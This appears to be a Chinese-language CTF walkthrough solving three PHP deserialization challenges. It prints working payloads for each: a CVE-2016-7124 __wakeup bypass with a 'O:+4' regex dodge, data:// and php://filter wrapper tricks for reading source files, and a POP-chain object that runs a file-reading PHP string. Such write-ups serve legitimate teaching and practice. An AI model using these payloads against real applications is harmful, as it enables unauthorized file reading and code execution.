第一题
本题需要绕过一个__wakeup()函数
和一个正则匹配preg_match('/[oc]:\d+:/i', $var)
__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。
绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。
正则匹配preg_match('/[oc]:\d+:/i', $var)如果出现的字符出现在存储的字典中则匹配成功
然后直接在属性前面的加上一个+加号绕过即可
绕过__wakeup:序列化中的属性只有1个然后直接改为2个即可触发条件。
代码中提示f15g_1s_here.php中有东西进行修改读取
$flag=new Demo("f15g_1s_here.php");
#把private $file = 'index.php';把index.php修改为:f15g_1s_here.php
$flag=serialize($flag);
#序列化输出Demo界面
$flag=str_replace('O:4','O:+4',$flag);
#修改里面的属性0:4修改为:0:+4匹配正则
$flag=str_replace(':1:',':2:',$flag);
#修改里面的属性1修改为2绕过__wakup函数
echo base64_encode($flag);
#输出结果为base64编码
运行结果:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==
直接传参即可
第二题
直接f12看到源码
第一个条件用/?txt传参里面的内容是:welcome to the bugkuctf
直接使用伪协议伪造:?txt=data://text/plain,welcome to the bugkuctf
第二个条件用file读取文件直接进行使用伪协议读取
源码中有提示地址hint.php
直接用伪协议读取&file=php://filter/read=convert.base64-encode/resource=hint.php
第三个条件是输入密码还未获取到先留空
拿base64去解码
解出
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){ //这里$this->file 可以设置为flag.php
echo file_get_contents($this->file); //显示flag.php内容
echo "<br>";
return ("good");
}
}
}
?>
直接进行序列化
<?PHP
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){ //这里$this->file 可以设置为flag.php
echo file_get_contents($this->file); //显示flag.php内容
echo "<br>";
return ("good");
}
}
}
$flag = new Flag();
#序列化界面
$flag->file="flag.php";
#直接把路径修改为flag.php
echo serialize($flag);
结果:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最后的payload为:?txt=data://text/plain,welcome to the bugkuctf&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
直接f12查看即可
第三题
直接构造序列化
class lemon {
protected $ClassObj;
function __construct() {
$this->ClassObj = new evil();
#此界面执行normal界面的类,可以利用此界面执行evil
}
function __destruct() {
}
}
class evil {
private $data="print_r(file_get_contents('flag.php'));";
#直接定义一个执行命令然后通过上面的lemon执行
}
echo urlencode(serialize(new lemon()));
结果:O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A39%3A%22print_r%28file_get_contents%28%27flag.php%27%29%29%3B%22%3B%7D%7D
直接传参f12查看即可